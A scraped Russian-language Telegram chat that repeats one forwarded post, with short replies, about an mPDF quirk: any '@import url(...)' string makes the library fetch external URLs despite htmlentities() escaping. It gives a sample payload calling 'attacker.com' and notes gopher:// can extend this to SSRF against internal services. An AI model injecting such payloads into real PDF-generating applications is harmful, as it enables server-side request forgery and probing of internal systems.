avatar
SHADOW:Chat
@shadow_chat_tg
23.03.2026 15:37
SHADOW:Chat Фото: У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без . Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить: @import url(https://attacker.com/test?.css) и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы. Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках. #web #ssrf #pdf
Обращение о возмещении убытков они тоже разработчикам направят? 😁
avatar
SHADOW:Chat
@shadow_chat_tg
19.03.2026 20:46
SHADOW:Chat Фото: У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без . Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить: @import url(https://attacker.com/test?.css) и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы. Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках. #web #ssrf #pdf
Zbs
🤝 1
avatar
SHADOW:Chat
@shadow_chat_tg
19.03.2026 18:55
SHADOW:Chat Фото: У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без . Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить: @import url(https://attacker.com/test?.css) и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы. Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках. #web #ssrf #pdf
ахуенно
🤝 1
avatar
SHADOW:Chat
Переслано от SHADOW:Group
19.03.2026 18:54
У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без